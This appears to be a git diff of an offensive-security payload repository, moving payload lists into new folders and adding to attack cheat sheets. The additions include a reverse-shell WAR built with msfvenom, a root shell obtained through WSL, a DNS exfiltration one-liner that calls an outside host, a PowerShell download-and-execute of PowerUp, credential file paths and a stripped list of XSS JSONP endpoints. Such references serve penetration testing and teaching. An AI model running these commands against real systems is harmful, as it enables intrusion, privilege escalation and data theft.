diff --git a/File Inclusion - Path Traversal/Intruders/Web-files.txt b/File Inclusion - Path Traversal/Intruders/Web-files.txt index e37d8f3..c9736e7 100644 --- a/File Inclusion - Path Traversal/Intruders/Web-files.txt +++ b/File Inclusion - Path Traversal/Intruders/Web-files.txt @@ -10,4 +10,5 @@ wp-admin.php /include/mysql.php /inc/mysql.php /sites/defaults/settings.php -/phpmyadmin/changelog.php \ No newline at end of file +/phpmyadmin/changelog.php +web.config \ No newline at end of file diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index 2d1c2d9..e9c14b5 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -1,13 +1,16 @@ -# Local/Remote File Inclusion +# File Inclusion - Path Traversal The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. +The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application + ## Summary +* [Path Traversal](#path-traversal) * [Basic LFI](#basic-lfi) * [Basic RFI](#basic-rfi) * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) - * [Wrapper php://filter](l#wrapper-phpfilter) + * [Wrapper php://filter](#wrapper-phpfilter) * [Wrapper zip://](#wrapper-zip) * [Wrapper data://](#wrapper-data) * [Wrapper expect://](#wrapper-expect) @@ -21,6 +24,9 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) + +## Path Traversal + Linux - Interesting files to check out : ```powershell @@ -81,6 +87,13 @@ The following log files are controllable and can be included with an evil payloa /var/log/mail ``` +Other easy win files. + +```powershell +/home/$USER/.bash_history +/var/run/secrets/kubernetes.io/serviceaccount +``` + ## Basic LFI ```powershell diff --git a/Insecure management interface/intruders/springboot_actuator.txt b/Insecure management interface/Intruder/springboot_actuator.txt similarity index 100% rename from Insecure management interface/intruders/springboot_actuator.txt rename to Insecure management interface/Intruder/springboot_actuator.txt diff --git a/LDAP injection/Intruders/LDAP_FUZZ.txt b/LDAP injection/Intruder/LDAP_FUZZ.txt similarity index 100% rename from LDAP injection/Intruders/LDAP_FUZZ.txt rename to LDAP injection/Intruder/LDAP_FUZZ.txt diff --git a/LDAP injection/Intruders/LDAP_attributes.txt b/LDAP injection/Intruder/LDAP_attributes.txt similarity index 100% rename from LDAP injection/Intruders/LDAP_attributes.txt rename to LDAP injection/Intruder/LDAP_attributes.txt diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md index 85c234c..0ecfaaf 100644 --- a/Methodology and Resources/Network Discovery.md +++ b/Methodology and Resources/Network Discovery.md @@ -40,6 +40,8 @@ bettercap -X --proxy --proxy-https -T ```powershell nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down" +-sn : Disable port scanning. Host discovery only. +-n : Never do DNS resolution ``` * Basic NMAP diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index cd8423f..a967976 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -114,6 +114,14 @@ p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while rea p.waitFor() ``` +### War + +```java +msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war +strings reverse.war | grep jsp # in order to get the name of the file +``` + + ### Lua Linux only diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index d6d844f..93bdb7b 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -1,7 +1,5 @@ # Windows - Privilege Escalation -Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/) - ## Windows Version and Configuration ```powershell @@ -132,7 +130,7 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /K REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList ``` -### Password in unattend.xml +### Passwords in unattend.xml Location of the unattend.xml files @@ -167,7 +165,7 @@ Example content The Metasploit module `post/windows/gather/enum_unattend` looks for these files. -## Processes Enum +## Processes Enumeration What processes are running? @@ -187,36 +185,32 @@ Do you have powershell magic? REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion ``` -## Uploading / Downloading files +## Using PowerSploit's PowerUp -a wget using powershell - -```powershell -powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe" -``` - -wget using bitsadmin (when powershell is not present) - -```powershell -cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe" -``` - -now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat - -```powershell -%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe -``` - -## Spot the weak service using PowerSploit's PowerUP +Spot the weak service using PowerSploit's PowerUp ```powershell powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks ``` +## Using Windows Subsystem for Linux (WSL) + +Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032) + +> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ .exe --default-user root. Now start your bind shell or reverse. + +```powershell +wsl whoami +./ubuntun1604.exe config --default-user root +wsl whoami +wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' +``` + ## Thanks to * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/) -* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/) \ No newline at end of file +* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/) +* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) \ No newline at end of file diff --git a/NoSQL injection/Intruders/NoSQL.txt b/NoSQL injection/Intruder/NoSQL.txt similarity index 100% rename from NoSQL injection/Intruders/NoSQL.txt rename to NoSQL injection/Intruder/NoSQL.txt diff --git a/Open redirect/Open-Redirect-payloads.txt b/Open redirect/Intruder/Open-Redirect-payloads.txt similarity index 100% rename from Open redirect/Open-Redirect-payloads.txt rename to Open redirect/Intruder/Open-Redirect-payloads.txt diff --git a/Open redirect/open_redirect_wordlist.txt b/Open redirect/Intruder/open_redirect_wordlist.txt similarity index 100% rename from Open redirect/open_redirect_wordlist.txt rename to Open redirect/Intruder/open_redirect_wordlist.txt diff --git a/Open redirect/openredirects.txt b/Open redirect/Intruder/openredirects.txt similarity index 100% rename from Open redirect/openredirects.txt rename to Open redirect/Intruder/openredirects.txt diff --git a/Remote commands execution/Intruders/command-execution-unix.txt b/Remote commands execution/Intruder/command-execution-unix.txt similarity index 100% rename from Remote commands execution/Intruders/command-execution-unix.txt rename to Remote commands execution/Intruder/command-execution-unix.txt diff --git a/Remote commands execution/Intruders/command_exec.txt b/Remote commands execution/Intruder/command_exec.txt old mode 100755 new mode 100644 similarity index 100% rename from Remote commands execution/Intruders/command_exec.txt rename to Remote commands execution/Intruder/command_exec.txt diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index a6717e9..40df955 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -152,6 +152,10 @@ Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbi for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done ``` +```powershell +$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il) +``` + ## Thanks to * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) diff --git a/SQL injection/Intruders/Auth_Bypass.txt b/SQL injection/Intruder/Auth_Bypass.txt similarity index 100% rename from SQL injection/Intruders/Auth_Bypass.txt rename to SQL injection/Intruder/Auth_Bypass.txt diff --git a/SQL injection/Intruders/Auth_Bypass2.txt b/SQL injection/Intruder/Auth_Bypass2.txt old mode 100755 new mode 100644 similarity index 100% rename from SQL injection/Intruders/Auth_Bypass2.txt rename to SQL injection/Intruder/Auth_Bypass2.txt diff --git a/SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Time.txt b/SQL injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt similarity index 100% rename from SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Time.txt rename to SQL injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt diff --git a/SQL injection/Intruders/FUZZDB_MSSQL.txt b/SQL injection/Intruder/FUZZDB_MSSQL.txt similarity index 100% rename from SQL injection/Intruders/FUZZDB_MSSQL.txt rename to SQL injection/Intruder/FUZZDB_MSSQL.txt diff --git a/SQL injection/Intruders/FUZZDB_MSSQL_Enumeration.txt b/SQL injection/Intruder/FUZZDB_MSSQL_Enumeration.txt similarity index 100% rename from SQL injection/Intruders/FUZZDB_MSSQL_Enumeration.txt rename to SQL injection/Intruder/FUZZDB_MSSQL_Enumeration.txt diff --git a/SQL injection/Intruders/FUZZDB_MYSQL.txt b/SQL injection/Intruder/FUZZDB_MYSQL.txt similarity index 100% rename from SQL injection/Intruders/FUZZDB_MYSQL.txt rename to SQL injection/Intruder/FUZZDB_MYSQL.txt diff --git a/SQL injection/Intruders/FUZZDB_MySQL-WHERE_Time.txt b/SQL injection/Intruder/FUZZDB_MySQL-WHERE_Time.txt similarity index 100% rename from SQL injection/Intruders/FUZZDB_MySQL-WHERE_Time.txt rename to SQL injection/Intruder/FUZZDB_MySQL-WHERE_Time.txt diff --git a/SQL injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt b/SQL injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt similarity index 100% rename from SQL injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt rename to SQL injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt diff --git a/SQL injection/Intruders/FUZZDB_Oracle.txt b/SQL injection/Intruder/FUZZDB_Oracle.txt similarity index 100% rename from SQL injection/Intruders/FUZZDB_Oracle.txt rename to SQL injection/Intruder/FUZZDB_Oracle.txt diff --git a/SQL injection/Intruders/FUZZDB_Postgres_Enumeration.txt b/SQL injection/Intruder/FUZZDB_Postgres_Enumeration.txt similarity index 100% rename from SQL injection/Intruders/FUZZDB_Postgres_Enumeration.txt rename to SQL injection/Intruder/FUZZDB_Postgres_Enumeration.txt diff --git a/SQL injection/Intruders/Generic_ErrorBased.txt b/SQL injection/Intruder/Generic_ErrorBased.txt old mode 100755 new mode 100644 similarity index 100% rename from SQL injection/Intruders/Generic_ErrorBased.txt rename to SQL injection/Intruder/Generic_ErrorBased.txt diff --git a/SQL injection/Intruders/Generic_TimeBased.txt b/SQL injection/Intruder/Generic_TimeBased.txt similarity index 100% rename from SQL injection/Intruders/Generic_TimeBased.txt rename to SQL injection/Intruder/Generic_TimeBased.txt diff --git a/SQL injection/Intruders/Generic_UnionSelect.txt b/SQL injection/Intruder/Generic_UnionSelect.txt old mode 100755 new mode 100644 similarity index 100% rename from SQL injection/Intruders/Generic_UnionSelect.txt rename to SQL injection/Intruder/Generic_UnionSelect.txt diff --git a/SQL injection/Intruders/SQL-Injection b/SQL injection/Intruder/SQL-Injection similarity index 100% rename from SQL injection/Intruders/SQL-Injection rename to SQL injection/Intruder/SQL-Injection diff --git a/SQL injection/Intruders/SQLi_Polyglots.txt b/SQL injection/Intruder/SQLi_Polyglots.txt similarity index 100% rename from SQL injection/Intruders/SQLi_Polyglots.txt rename to SQL injection/Intruder/SQLi_Polyglots.txt diff --git a/SQL injection/Intruders/payloads-sql-blind-MSSQL-INSERT b/SQL injection/Intruder/payloads-sql-blind-MSSQL-INSERT similarity index 100% rename from SQL injection/Intruders/payloads-sql-blind-MSSQL-INSERT rename to SQL injection/Intruder/payloads-sql-blind-MSSQL-INSERT diff --git a/SQL injection/Intruders/payloads-sql-blind-MSSQL-WHERE b/SQL injection/Intruder/payloads-sql-blind-MSSQL-WHERE similarity index 100% rename from SQL injection/Intruders/payloads-sql-blind-MSSQL-WHERE rename to SQL injection/Intruder/payloads-sql-blind-MSSQL-WHERE diff --git a/SQL injection/Intruders/payloads-sql-blind-MySQL-INSERT b/SQL injection/Intruder/payloads-sql-blind-MySQL-INSERT similarity index 100% rename from SQL injection/Intruders/payloads-sql-blind-MySQL-INSERT rename to SQL injection/Intruder/payloads-sql-blind-MySQL-INSERT diff --git a/SQL injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY b/SQL injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY similarity index 100% rename from SQL injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY rename to SQL injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY diff --git a/SQL injection/Intruders/payloads-sql-blind-MySQL-WHERE b/SQL injection/Intruder/payloads-sql-blind-MySQL-WHERE similarity index 100% rename from SQL injection/Intruders/payloads-sql-blind-MySQL-WHERE rename to SQL injection/Intruder/payloads-sql-blind-MySQL-WHERE diff --git a/SSRF injection/ip.py b/SSRF injection/Files/ip.py similarity index 100% rename from SSRF injection/ip.py rename to SSRF injection/Files/ip.py diff --git a/SSRF injection/Parser & Curl < 7.54.png b/SSRF injection/Images/Parser & Curl < 7.54.png similarity index 100% rename from SSRF injection/Parser & Curl < 7.54.png rename to SSRF injection/Images/Parser & Curl < 7.54.png diff --git a/SSRF injection/SSRF_Parser.png b/SSRF injection/Images/SSRF_Parser.png similarity index 100% rename from SSRF injection/SSRF_Parser.png rename to SSRF injection/Images/SSRF_Parser.png diff --git a/SSRF injection/WeakParser.jpg b/SSRF injection/Images/WeakParser.jpg similarity index 100% rename from SSRF injection/WeakParser.jpg rename to SSRF injection/Images/WeakParser.jpg diff --git a/SSRF injection/README.md b/SSRF injection/README.md index dfcdb30..3d645b9 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -168,7 +168,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/ http://127.1.1.1:80#\@127.2.2.2:80/ ``` -![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/WeakParser.jpg) +![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/WeakParser.jpg) ## SSRF via URL Scheme diff --git a/Server Side Template injections/serverside.png b/Server Side Template injections/Images/serverside.png similarity index 100% rename from Server Side Template injections/serverside.png rename to Server Side Template injections/Images/serverside.png diff --git a/Server Side Template injections/Intruders/JHADDIX_SSI_Injection.txt b/Server Side Template injections/Intruder/JHADDIX_SSI_Injection.txt similarity index 100% rename from Server Side Template injections/Intruders/JHADDIX_SSI_Injection.txt rename to Server Side Template injections/Intruder/JHADDIX_SSI_Injection.txt diff --git a/Server Side Template injections/Intruders/ssi_quick.txt b/Server Side Template injections/Intruder/ssi_quick.txt old mode 100755 new mode 100644 similarity index 100% rename from Server Side Template injections/Intruders/ssi_quick.txt rename to Server Side Template injections/Intruder/ssi_quick.txt diff --git a/Tar commands execution/--checkpoint-action=exec=sh shell.sh b/Tar commands execution/Files/--checkpoint-action=exec=sh shell.sh old mode 100755 new mode 100644 similarity index 100% rename from Tar commands execution/--checkpoint-action=exec=sh shell.sh rename to Tar commands execution/Files/--checkpoint-action=exec=sh shell.sh diff --git a/Tar commands execution/--checkpoint=1 b/Tar commands execution/Files/--checkpoint=1 old mode 100755 new mode 100644 similarity index 100% rename from Tar commands execution/--checkpoint=1 rename to Tar commands execution/Files/--checkpoint=1 diff --git a/Tar commands execution/shell.sh b/Tar commands execution/Files/shell.sh old mode 100755 new mode 100644 similarity index 100% rename from Tar commands execution/shell.sh rename to Tar commands execution/Files/shell.sh diff --git a/Traversal directory/deep_traversal.txt b/Traversal directory/Intruder/deep_traversal.txt old mode 100755 new mode 100644 similarity index 100% rename from Traversal directory/deep_traversal.txt rename to Traversal directory/Intruder/deep_traversal.txt diff --git a/Traversal directory/directory_traversal.txt b/Traversal directory/Intruder/directory_traversal.txt old mode 100755 new mode 100644 similarity index 100% rename from Traversal directory/directory_traversal.txt rename to Traversal directory/Intruder/directory_traversal.txt diff --git a/Traversal directory/dotdotpwn.txt b/Traversal directory/Intruder/dotdotpwn.txt old mode 100755 new mode 100644 similarity index 100% rename from Traversal directory/dotdotpwn.txt rename to Traversal directory/Intruder/dotdotpwn.txt diff --git a/Traversal directory/traversals-8-deep-exotic-encoding.txt b/Traversal directory/Intruder/traversals-8-deep-exotic-encoding.txt similarity index 100% rename from Traversal directory/traversals-8-deep-exotic-encoding.txt rename to Traversal directory/Intruder/traversals-8-deep-exotic-encoding.txt diff --git a/XSS injection/Intruders/jsonp_endpoint.txt b/XSS injection/Intruders/jsonp_endpoint.txt new file mode 100644 index 0000000..e514d81 --- /dev/null +++ b/XSS injection/Intruders/jsonp_endpoint.txt @@ -0,0 +1,54 @@ +#Google.com: +"> +"> +"> +"> +#Blogger.com: +"> +#Yandex: +"> +"> +#VK.com: +"> +#Marketo.com +"> +"> +#AlibabaGroup: +"> +"> +"> +"> +"> +"> +"> +#Uber.com: +"> +#AOL/Yahoo +"> +"> +"> +"> +"> +"> +"> +#Twitter.com: +"> +"> +"> +#Others: +"> +"> +"> +"> +"> +"> +"> +"> +"> +"> +"> +"> +#GoogleAPI's +"> +"> +ng-app"ng-csp ng-click=$event.view.alert(1337)> \ No newline at end of file diff --git a/XSS injection/README.md b/XSS injection/README.md index 82f8620..3ce0402 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -778,6 +778,8 @@ Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.wi